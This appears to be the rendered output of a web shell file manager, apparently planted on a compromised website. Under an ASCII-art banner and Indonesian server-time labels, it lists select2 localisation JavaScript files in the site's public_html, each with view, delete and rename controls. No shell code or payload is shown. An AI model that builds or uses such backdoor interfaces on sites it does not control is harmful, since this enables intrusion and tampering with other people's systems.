Hell Yeah Pointer 4
     __    Bye Litespeed   _____ 
     ██████   ██████ ███████████       █████████  █████   ████ █████   ████           
░░██████ ██████ ░░███░░░░░███     ███░░░░░███░░███   ███░ ░░███   ███░            
 ░███░█████░███  ░███    ░███    ░███    ░░░  ░███  ███    ░███  ███              
 ░███░░███ ░███  ░██████████     ░░█████████  ░███████     ░███████               
 ░███ ░░░  ░███  ░███░░░░░███     ░░░░░░░░███ ░███░░███    ░███░░███              
 ░███      ░███  ░███    ░███     ███    ░███ ░███ ░░███   ░███ ░░███             
 █████     █████ █████   █████   ░░█████████  █████ ░░████ █████ ░░████                        
Zona waktu server: America/Sao_Paulo
Waktu server saat ini: 2026-09-05 16:09:30
curdir: / / home / cienp / public_html / portal / vendors / select2 / src / js / select2 / i18n / [ GO Home ]


Item Name
Size
Date
Permissions
View
Delete
Rename
. 4096 2026-04-17 22:49:25 0755
.. 4096 2026-04-17 22:49:26 0755
ar.js 8429 2026-04-17 22:49:24 0644
az.js 8149 2026-04-17 22:49:18 0644
bg.js 8602 2026-04-17 22:49:17 0644
ca.js 8628 2026-04-17 22:49:18 0644
cs.js 9087 2026-04-17 22:49:22 0644
da.js 8401 2026-04-17 22:49:20 0644
de.js 8337 2026-04-17 22:49:20 0644
el.js 8859 2026-04-17 22:49:13 0644
en.js 8457 2026-04-17 22:49:21 0644
es.js 8637 2026-04-17 22:49:25 0644
et.js 8518 2026-04-17 22:49:13 0644
eu.js 8594 2026-04-17 22:49:16 0644
fa.js 8598 2026-04-17 22:49:20 0644
fi.js 8145 2026-04-17 22:49:15 0644
fr.js 8590 2026-04-17 22:49:23 0644
gl.js 8559 2026-04-17 22:49:12 0644
he.js 8746 2026-04-17 22:49:17 0644
hi.js 8720 2026-04-17 22:49:21 0644
hr.js 8476 2026-04-17 22:49:14 0644
hu.js 8179 2026-04-17 22:49:23 0644
id.js 8227 2026-04-17 22:49:18 0644
is.js 8398 2026-04-17 22:49:14 0644
it.js 8574 2026-04-17 22:49:25 0644
ja.js 8388 2026-04-17 22:49:17 0644
km.js 8606 2026-04-17 22:49:22 0644
ko.js 8396 2026-04-17 22:49:14 0644
lt.js 8824 2026-04-17 22:49:24 0644
lv.js 8628 2026-04-17 22:49:12 0644
mk.js 8646 2026-04-17 22:49:16 0644
ms.js 8261 2026-04-17 22:49:15 0644
nb.js 8363 2026-04-17 22:49:18 0644
nl.js 8533 2026-04-17 22:49:23 0644
pl.js 8733 2026-04-17 22:49:13 0644
pt-BR.js 8528 2026-04-17 22:49:20 0644
pt.js 8469 2026-04-17 22:49:12 0644
ro.js 8561 2026-04-17 22:49:25 0644
ru.js 8973 2026-04-17 22:49:15 0644
sk.js 9195 2026-04-17 22:49:24 0644
sr-Cyrl.js 8880 2026-04-17 22:49:17 0644
sr.js 8748 2026-04-17 22:49:23 0644
sv.js 8349 2026-04-17 22:49:21 0644
th.js 8469 2026-04-17 22:49:15 0644
tr.js 8239 2026-04-17 22:49:26 0644
uk.js 8817 2026-04-17 22:49:22 0644
vi.js 8371 2026-04-17 22:49:12 0644
zh-CN.js 8322 2026-04-17 22:49:19 0644
zh-TW.js 8240 2026-04-17 22:49:19 0644